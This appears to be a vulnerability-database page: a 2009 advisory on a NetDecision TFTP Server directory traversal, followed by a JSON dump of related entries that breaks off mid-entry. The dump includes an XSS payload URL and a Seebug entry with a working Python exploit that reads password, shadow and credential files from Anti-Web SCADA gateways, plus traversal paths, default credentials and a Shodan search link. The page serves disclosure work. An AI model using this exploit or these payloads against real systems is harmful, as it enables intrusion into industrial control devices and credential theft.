NetDecision TFTP Server 4.2 TFTP Directory Traversal
2009-05-21T00:00:00
ID SECURITYVULNS:DOC:21860 Type securityvulns Reporter Securityvulns Modified 2009-05-21T00:00:00
Description
[--Vulnerability Summary--]
Title: NetDecision TFTP Server 4.2 TFTP Directory Traversal
Product: NetDecision TFTP Server 4.2
Discovered: April 1, 2009
Discovered by: Rob Kraus, princeofnigeria (PoN)
Vendor: NetMechanica
Vendor URL: http://www.netmechanica.com/downloads/
Vendor notification date: April 2, 2009 and May 12, 2009
Vendor response date: None
Vendor acknowledgement: No
Vendor provided fix: No
Release coordinated with the vendor: No response from vendor
Public disclosure date: May 16, 2009
Affects: NetDecision TFTP Server 4.2
Fixed in: N/A
Risk: MEDIUM
Vulnerability Description: NetDecision TFTP Server 4.2 is prone to a directory-traversal
vulnerability because it fails to sanitize TFTP GET and PUT requests. By using a specially
crafted TFTP request an attacker is capable of putting (PUT) and retrieving (GET) files
outside of the TFTP root directory.
Impact: The ability to PUT and GET files outside of the TFTP root directory may allow an
attacker to obtain more information about the underlying operating system and applications
running on the host. Additionally, malicious code can be uploaded to the host operating system.
[--Background--]
Type of vulnerability: Input validation flaw
Who can exploit it: Local and remote users
Vulnerability Scope: The default installation of NetDecision TFTP Server 4.2 will allow
exploitation of this vulnerability.
Keywords: security, vulnerability, tftp, directory traversal, princeofnigeria, gui, windows,
server
[--Background--]
Type of vulnerability: Input validation flaw
Who can exploit it: Local and remote users
NetDecision TFTP Server 4.2 is an application that provides services for transferring
configuration files, firmware files and other types of data using the TFTP protocol. The
application should restrict PUT and GET requests to the contents of the TFTP root directory to
prevent obtaining data from other parts of the host operating system or uploading malicious
code.
Vulnerability Scope: The default installation of NetDecision TFTP Server 4.2 will allow
exploitation of this vulnerability.
[--More Details--]
Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP
client software. No exploit code is required.
[--Fix or Workaround Information--]
Patch availability: None
Vendor provided fix: None
Workarounds: None available at this time, design flaw. Discontinue use of this product until
a stable patch is released.
[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs
{"id": "SECURITYVULNS:DOC:21860", "bulletinFamily": "software", "title": "NetDecision TFTP Server 4.2 TFTP Directory Traversal", "description": "[--Vulnerability Summary--]\r\n\r\nTitle: NetDecision TFTP Server 4.2 TFTP Directory Traversal\r\nProduct: NetDecision TFTP Server 4.2\r\n\r\nDiscovered: April 1, 2009\r\nDiscovered by: Rob Kraus, princeofnigeria (PoN)\r\n\r\nVendor: NetMechanica\r\nVendor URL: http://www.netmechanica.com/downloads/\r\nVendor notification date: April 2, 2009 and May 12, 2009\r\nVendor response date: None\r\nVendor acknowledgement: No\r\nVendor provided fix: No\r\nRelease coordinated with the vendor: No response from vendor\r\nPublic disclosure date: May 16, 2009\r\n\r\nAffects: NetDecision TFTP Server 4.2\r\nFixed in: N/A\r\nRisk: MEDIUM\r\n\r\nVulnerability Description: NetDecision TFTP Server 4.2 is prone to a directory-traversal\r\nvulnerability because it fails to sanitize TFTP GET and PUT requests. By using a specially\r\ncrafted TFTP request an attacker is capable of putting (PUT) and retrieving (GET) files\r\noutside of the TFTP root directory.\r\n\r\nImpact: The ability to PUT and GET files outside of the TFTP root directory may allow an\r\nattacker to obtain more information about the underlying operating system and applications\r\nrunning on the host. Additionally, malicious code can be uploaded to the host operating system.\r\n\r\n[--Background--]\r\n\r\nType of vulnerability: Input validation flaw\r\nWho can exploit it: Local and remote users\r\n\r\nVulnerability Scope: The default installation of NetDecision TFTP Server 4.2 will allow\r\nexploitation of this vulnerability.\r\n\r\nKeywords: security, vulnerability, tftp, directory traversal, princeofnigeria, gui, windows,\r\nserver\r\n\r\n[--Background--]\r\n\r\nType of vulnerability: Input validation flaw\r\nWho can exploit it: Local and remote users\r\n\r\nNetDecision TFTP Server 4.2 is an application that provides services for transferring\r\nconfiguration files, firmware files and other types of data using the TFTP protocol. The\r\napplication should restrict PUT and GET requests to the contents of the TFTP root directory to\r\nprevent obtaining data from other parts of the host operating system or uploading malicious\r\ncode.\r\n\r\nVulnerability Scope: The default installation of NetDecision TFTP Server 4.2 will allow\r\nexploitation of this vulnerability.\r\n\r\n[--More Details--]\r\n\r\nExploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP\r\nclient software. No exploit code is required.\r\n\r\n[--Fix or Workaround Information--]\r\n\r\nPatch availability: None\r\nVendor provided fix: None\r\nWorkarounds: None available at this time, design flaw. Discontinue use of this product until\r\na stable patch is released.\r\n\r\n[--Disclosure Policy--]\r\n\r\nPrinceofNigeria.org Vulnerability Disclosure Policy\r\nhttp://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1\r\n\r\n[--Disclosure History--]\r\nPublic disclosure date: May 16, 2009\r\n\r\n[--References--]\r\nCVE-ID:\r\nBugtraq ID:\r\nSecunia ID:\r\nOSVDB ID:\r\n\r\n[--Author--]\r\nRob Kraus, princeofnigeria (PoN)\r\nWebsite: www.princeofnigeria.org/blogs", "published": "2009-05-21T00:00:00", "modified": "2009-05-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21860", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:30", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-08-31T11:10:30", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB317244", "KB980408", "KB981401", "KB2410679", "KB2785908", "KB953331", "KB2404575", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:30", "rev": 2}, "vulnersScore": -0.1}, "affectedSoftware": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "seebug": [{"lastseen": "2018-06-08T07:13:29", "description": "# Exploit Title: Apps industrial OT over Server: \"Anti-Web 3.x.x < 3.8.x\" vuln: Local File Inclusion\r\n\r\n*** \r\n\t[*] Date: 15/05/2017\r\n\t[*] Exploit Author: Bertin Jose ( @bertinjoseb ) && Fernandez Ezequiel ( @capitan_alfa ) \r\n\t[*] Vendor: Multiples vendors\r\n\t[*] Category: Industrial OT webapps\r\n***\r\n### [+] DESCRIPTION:\r\n***\r\n\t[*] vulnerability:\t\tLFI ( Local File Inclusion ) \r\n\t[*] Attack Vector (AV): \tRemote\r\n\t[*] Attack Complexity (AC): \tLow\r\n\t[*] Privileges Required (PR):\tNone (no necesita autenticacion alguna)\r\n\t[*] Confidentiality (C): \tHigh\t\r\n***\r\n\r\n### LFI:\r\nUn \"LFI\" es una vulnerabilidad sobre aplicaciones web que permiten la inclusi\u00f3n de archivos locales, es decir aquellos ficheros que se encuentran en el mismo servidor de la web. La vulnerabilidad radica en la posibilidad de modificar en origen de estos archivos.\r\n\r\nLa aplicaciones web de los dispositivos testeados permiten las obtenci\u00f3n de archivos alojados en el server. Enviando una peticion POST adulterada, apuntando a archivos existentes en el servidor. \r\nSin necesidad de ningun tipo de credencial.\r\n\r\n\r\n## AFFECTED PRODUCTS (testead):\r\n\r\n* CRE Technology - BSD plus \t\t\t\r\n* Supervision SEGEM Stockage Monaco\t\r\n\r\n* SAUTER\"\t\t\t\t\t\t\t\t\r\n* Ny sida 5\t\t\t\t\t\t\r\n* Air-Site\u00ae - WEB100\t\t\t\t\t\r\n* ABB, SREA-01\r\n* ABB SREA-50, UGETAM-GES\r\n* ABB SREA-50, EDM - De Marco\r\n* AEDILIS SMART-1\r\n* Alliance - AWU 500\r\n* system Alliance - AWU 600\r\n* Carlo Gavazzi - SIU-DLG\r\n* DSE / Deep Sea Electronics\r\n* NetBiter\u00ae - FGW200\r\n* NetBiter® - WS100\r\n* NetBiter® - EC150\r\n* NetBiter® - WS200\r\n* NetBiter® - EC250\r\n* NetBiter® - webSCADA\r\n* OUMAN - EH-net\r\n* Smart Qmmunicator\r\n* SyxthSense WebBiter\r\n* (and more....)\r\n\r\n* [!] It's products that makes it possible to remotely operate \"Scada\" control devices and systems via the internet.\r\n\r\n\r\n## VERSION WEBSERVER:\r\n\r\n* Anti-Web V3.0.7-hms2\r\n* ...\r\n* Anti-Web V3.3.5\r\n* ...\r\n* Anti-Web V3.6.1\r\n* ...\t\r\n* Anti-Web V3.7.1\r\n* Anti-Web V3.7.2\r\n* ...\r\n* Anti-Web V3.8.1\r\n* Anti-Web V3.8.2\r\n* Anti-Web V3.8.3\r\n* Anti-Web V3.8.4\r\n* Anti-Web V3.8.5\r\n* Anti-Web V3.8.7\r\n\r\n## Steps To Reproduction:\r\n\r\n### Simple HTTP Request \r\n\r\n\r\n```\r\n\r\n\tPOST /cgi-bin/write.cgi HTTP/1.1\r\n\tHost: <host>\r\n\tUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4\r\n\tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\tAccept-Language: es-AR,en-US;q=0.7,en;q=0.3\r\n\tReferer: http://<host>/\r\n\tConnection: close\r\n\tContent-Type: application/x-www-form-urlencoded\r\n\tContent-Length: 52\r\n\r\n\tpage=/&template=../../../../../../etc/passwd\r\n\r\n\r\n\r\n```\r\n\r\n## on the wild!:\r\n[Servers anti-web](https://www.shodan.io/search?query=anti-web)\r\n\r\n\r\n\r\n### PANEL WEB (examples):\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Tool / PoC:\r\n```anti-web-v1.py <host> <port>```\r\n\r\n\r\n### RUN THE POC:\r\n\r\n\r\n## cool file: *home/config/users.cfg*\r\nThe file \"home/config/users.cfg\" have all credentials\r\n\r\n\r\n\r\n#### format of passwords hash:\r\n\r\n* hashUser = md5(password + username) *\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Other/Old CVE\r\n\r\n\r\n[CVE-2010-4730](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4730)\r\n[CVE-2010-4733](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4733)\r\n\r\nThe [Security Advisories and Alerts](https://tools.cisco.com/security/center/viewAlert.x?alertId=21860) of cisco, write:\r\n## \"Intellicom Netbiter webSCADA Multiple Vulnerabilities\"\r\n***\r\n\r\n\tTo exploit these vulnerabilities, authentication with superadmin privileges is required. Since the affected software by default assigns superadmin privileges to the user, exploitation of default passwords could increase the security risk.\r\n\r\n\tHowever, the affected application fails to prompt for the modification of default passwords during installation. This flaw could allow the attacker to exploit the existing vulnerabilities within the application if an administrator has not changed the default credentials.\r\n\r\n\tIntellicom has released updated packages at the following links:\r\n\r\n\tWS100\r\n\tNetbiter v3.30.2 b184\r\n\r\n\tWS200\r\n\tNetbiter v3.30.4 b277\r\n\r\n\tICS-CERT has released advisories at the following links: ICSA-10-316-01 and ICSA-10-316-01A\r\n\r\n***\r\n### Still vulnerable :\r\n##### Now and without any credentials #\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Scadas examples :\r\n\r\n---\r\n\r\n---\r\n\r\n---\r\n\r\n---\r\n\r\n\r\n\r\n\r\n## PATHS LFIs:\r\n\r\n\t[*] PATHS_CONF:\r\n\t\t../etc/config/resolv.conf\r\n\t\t../etc/config/ethernet.conf\r\n\t\t../etc/config/system.conf\r\n\t\t../etc/config/rtu_mast.conf \r\n\t\t../etc/config/general.conf\r\n\t\t../etc/config/awhttpd.conf\r\n\r\n\t\t--------------------------------------------\r\n\t\tprivkey \t\t/etc/config/privkeySrv.pem\r\n\t\tcertificate \t/etc/config/certSrv.pem\r\n\t\t----------------------------------------------\r\n\r\n\t[*] PATH CGI:\r\n\t\t/home/httpd/cgi-bin/read.cgi\r\n\t\t/home/httpd/cgi-bin/write.cgi\r\n\t\t/home/httpd/cgi-bin/systeminfo.cgi \r\n\t\t/home/httpd/cgi-bin/log.tar \r\n\t\t/home/httpd/cgi-bin/lcomm.cgi\r\n\t\t/home/httpd/cgi-bin/backup.nbb\r\n\r\n\r\n\t[*] PATHS_extra:\r\n\r\n\t\t../home/config/passwd\r\n\r\n\t\t../etc/passwd\r\n\t\t../etc/group\r\n\t\t../etc/hosts\r\n\t\t../etc/config/crontab\r\n\t\t../etc/version\r\n\t\t../etc/inittab\r\n\t\t../etc/fstab\r\n\r\n\t\t../etc/config/tsmgr.xml\r\n\t\t../etc/config/eventmgr.xml\r\n\t\t../etc/config/commgr.xml\r\n\t\t\t\t\t\t\t\t\t <Server>\r\n\t\t\t\t\t\t\t\t\t <UserName>admin</UserName>\r\n\t\t\t\t\t\t\t\t\t <Password>admin</Password>\r\n\t\t\t\t\t\t\t\t\t <LocalIP>10.200.2.1</LocalIP>\r\n\t\t\t\t\t\t\t\t\t <RemoteIP>10.200.2.2</RemoteIP>\r\n\t\t\t\t\t\t\t\t\t </Server>\r\n\t\t../etc/config/events.xml\r\n\r\n\t\t../etc/config/interfaces.xml\r\n\t\t../etc/config/vendorpages.xml\r\n\t\t../etc/config/controllers.xml\r\n\t\t../etc/config/templates/controllers/1.xml\r\n\t\t../etc/config/templates/controllers/broadcast.xml\r\n\t\t../var/alarmstatus.xml\r\n\t\t../tmp/testmail.xml\r\n\r\n\t\t../var/log/log.csv\r\n\t\t../home/log/log.csv", "published": "2017-09-20T00:00:00", "type": "seebug", "title": "Apps industrial OT over Server: Anti-Web Local File Inclusion(CVE-2017-9097)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4730", "CVE-2010-4733", "CVE-2017-9097"], "modified": "2017-09-20T00:00:00", "id": "SSV:96556", "href": "https://www.seebug.org/vuldb/ssvid-96556", "sourceData": "\n # -*- coding: utf-8 -*- \r\nimport requests\r\nimport sys\r\n\r\nbanner = '''\r\n\r\n\t\t|=--------------------------------------------------------------------=|\r\n\t\t|=---------=[ Server: \"Anti-Web 3.0.x < 3.8.x\" LFI Exploit ]=---------=|\r\n\t\t|=--------------------------=[ 15 may 2017 ]=-------------------------=|\r\n\t\t|=-------------------------=[ Researcher: ]=------------------------=|\r\n\t\t|=---------------=[ Bertin Jose && Fernandez Ezequiel ]=--------------=|\r\n\t\t|=--------------------------------------------------------------------=|\r\n\r\n'''\r\n\r\ndetails = ''' \r\n # Exploit Title: Apps industrial OT over Server: \"Anti-Web 3.0.x < 3.8.x\" Local File Inclusion\r\n # Date: 15/05/2017\r\n # Exploit Author: Bertin Jose ( @bertinjoseb ) && Fernandez Ezequiel ( @capitan_alfa )\r\n # Vendor: Multiples vendors\r\n # Category: Industrial OT webapps\r\n\r\n'''\r\n\r\ndm \t\t= sys.argv[1]\r\nport \t= sys.argv[2]\r\n\r\nheaders = {}\r\n\r\nclass Colors:\r\n BLUE \t\t= '\\033[94m'\r\n GREEN \t\t= '\\033[32m'\r\n RED \t\t= '\\033[0;31m'\r\n DEFAULT\t\t= '\\033[0m'\r\n ORANGE \t\t= '\\033[33m'\r\n WHITE \t\t= '\\033[97m'\r\n BOLD \t\t= '\\033[1m'\r\n BR_COLOUR \t= '\\033[1;37;40m'\r\n\r\n\r\nuriPath = \"/cgi-bin/write.cgi\"\r\nhost = \"http://\"+dm+\":\"+port+uriPath\r\n\r\n#xfile \t= \"etc/config/system.conf\"\r\nxfile \t= \"etc/passwd\"\r\n\r\nLFI \t= \"../../../../../../\"+str(xfile)\r\n\r\nlenLFI = int(len(LFI))\r\nContLen = str(16+lenLFI)\r\n\r\nheaders[\"Host\"] \t\t\t= dm\r\nheaders[\"User-Agent\"]\t\t= \"Mozilla/5.0 (X11; Linux x86_64; rv:43.0)\"\r\nheaders[\"Accept\"] \t\t\t= \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\" \r\nheaders[\"Content-Length\"]\t= ContLen\r\nheaders[\"Accept-Languag\"] \t= \"es-AR,en-US;q=0.7,en;q=0.3\"\r\nheaders[\"Referer\"] \t\t\t= host\r\nheaders[\"Connection\"] \t\t= \"close\"\r\nheaders[\"Content-Type\"] \t= \"application/x-www-form-urlencoded\"\r\n\r\nprint Colors.GREEN+banner\r\nprint Colors.BLUE+details\r\n\r\n\r\nprint Colors.GREEN+\" [*] HOST:\\t\"+Colors.ORANGE+host\r\nprint Colors.GREEN+\" [*] POST:\\t\"+Colors.BLUE+\"page=/&template=<\"+Colors.RED+\" LFI \"+Colors.BLUE+\">\"\r\n\r\n# POC 0: get_file: /etc/passwd \r\nthePost0 = \"page=/&template=\"+LFI\r\nr0 = requests.post(host, data=thePost0,headers=headers)\r\n\r\n# ---------------------------------------------------------------------\r\n# POC 1: get_file: /etc/shadow \r\nthePost1 = \"page=/&template=../../../../../../etc/shadow\"\r\nr1 = requests.post(host, data=thePost1,headers=headers)\r\n# ---------------------------------------------------------------------\r\n\r\n# POC 2: get_file: /etc/config/system.conf\r\nthePost2 = \"page=/&template=../../../../../../etc/config/system.conf\"\r\nr2 = requests.post(host, data=thePost2,headers=headers)\r\n# ---------------------------------------------------------\r\n\r\n# POC 3: get_file: etc/config/system.conf\r\nthePost3 = \"page=/&template=../../../../../../etc/version\"\r\nr3 = requests.post(host, data=thePost3,headers=headers)\r\n# ---------------------------------------------------------\r\n\r\n# POC 4: get_file: /etc/config/crontab\r\nthePost4 = \"page=/&template=../../../../../../etc/config/crontab\"\r\nr4 = requests.post(host, data=thePost4, headers=headers)\r\n# ---------------------------------------------------------\r\n\r\n# POC 5: get_file: /home/config/users.cfg\r\nthePost5 = \"page=/&template=../../../../../../home/config/users.cfg\"\r\nr5 = requests.post(host, data=thePost5, headers=headers)\r\n# ---------------------------------------------------------\r\n# POC 5: get_file: /var/sessions.conf\r\nthePost6 = \"page=/&template=../../../../../../var/sessions.conf\"\r\nr6 = requests.post(host, data=thePost6, headers=headers)\r\n# ---------------------------------------------------------\r\n\r\n\r\nprint \"\\n\"\r\nx0_Output = r0.text\r\n\r\nx1_Output = r1.text\r\n\r\nx2_Output = r2.text\r\n\r\nx3_Output = r3.text\r\n\r\nx4_Output = r4.text\r\n\r\nx5_Output = r5.text\r\n\r\nx6_Output = r6.text\r\n\r\n\r\nprint Colors.GREEN+\" |=--------------------------=[ OUTPUT - POC ]=-------------------------=|\\n\" \r\n\r\nprint Colors.GREEN+\" [+] /etc/passwd\"\r\nprint Colors.ORANGE+\"\\r\"+x0_Output\r\n\r\nprint Colors.GREEN+\" [+] /etc/shadow\"\r\nprint Colors.ORANGE+\"\\r\"+x1_Output\r\n\r\nprint Colors.GREEN+\"\\n [+] /etc/config/system.conf\"\r\nprint Colors.ORANGE+\"\\r\"+x2_Output+Colors.DEFAULT+Colors.DEFAULT\r\n\r\nprint Colors.GREEN+\"\\n [+] /etc/version (Kernel version)\"\r\nprint Colors.ORANGE+\"\\r\"+x3_Output+Colors.DEFAULT+Colors.DEFAULT\r\n\r\nprint Colors.GREEN+\"\\n [+] /etc/config/crontab\"\r\nprint Colors.ORANGE+\"\\r\"+x4_Output+Colors.DEFAULT+Colors.DEFAULT\r\n\r\n\r\nprint Colors.GREEN+\"\\n [+] home/config/users.cfg\"\r\nprint Colors.ORANGE+\"\\r\"+x5_Output+Colors.DEFAULT+Colors.DEFAULT\r\n\r\n\r\nprint Colors.GREEN+\"\\n [+] /var/sessions.conf\"\r\nprint Colors.ORANGE+\"\\r\"+x6_Output+Colors.DEFAULT+Colors.DEFAULT\r\n\r\n\r\n\r\n\r\n\r\n'''\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9097\r\nfirst rce (CVE-2017-9097):\r\n\t\t#> ps aux \r\n\t\t PID Uid VmSize Stat Command\r\n\t\t 1 root SW init \r\n\t\t 2 root SW [keventd]\r\n\t\t 3 root RWN [ksoftirqd_CPU0]\r\n\t\t 4 root SW [kswapd]\r\n\t\t 5 root SW [bdflush]\r\n\t\t 6 root SW [kupdated]\r\n\t\t 7 root SW [mtdblockd]\r\n\t\t 21 root SW /bin/syslogd -n \r\n\t\t 27 root SWN [jffs2_gcd_mtd4]\r\n\t\t 78 root SW /bin/hicpd \r\n\t\t 108 root SW wda \r\n\t\t 120 root SW rtu_mast -d 3 \r\n\t\t 129 root SW commgr \r\n\t\t 145 root SW tsmgr -d 4 \r\n\t\t 162 root SW cron -d 3 \r\n\t\t 171 root SW dscopy -d 3 \r\n\t\t 180 root SW eventmgr -d 3 \r\n\t\t 205 root SW /bin/inetd \r\n\t\t 206 root SW /bin/sh /var/start_ntp \r\n\t\t 207 root SW /usr/bin/awhttpd /etc/config/awhttpd.conf \r\n\t\t 208 root SW msntp -r -P no -x 120 pool.ntp.org \r\n\t\t 1047 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t 1065 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t 1066 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t 1245 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t 1280 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t 1359 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t 1690 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t 1969 root SW /home/httpd/cgi-bin/read.cgi \r\n\t\t10527 root SW /home/httpd/cgi-bin/write.cgi \r\n\t'''\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96556"}], "openbugbounty": [{"lastseen": "2018-08-15T22:19:48", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Open Bug Bounty ID: OBB-187374\n\nDescription| Value \n---|--- \nAffected Website:| ettoday.net \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://www.ettoday.net/tools/player/33434-21860?title=xxxxx&show;_ad=';alert('OPENBUGBOUNTY');//\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 20 October, 2016 16:43 GMT \nVulnerability Verified:| 20 October, 2016 16:45 GMT \nWebsite Operator Notified:| 20 October, 2016 16:45 GMT \nPublic Report Published[without any technical details]:| 20 October, 2016 16:45 GMT \nVulnerability Fixed:| 7 August, 2018 12:53 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 19 November, 2016 16:43 GMT\n", "modified": "2016-11-19T16:43:00", "published": "2016-10-20T16:43:00", "id": "OBB:187374", "href": "https://www.openbugbounty.org/reports/187374/", "type": "openbugbounty", "title": "ettoday.net XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: 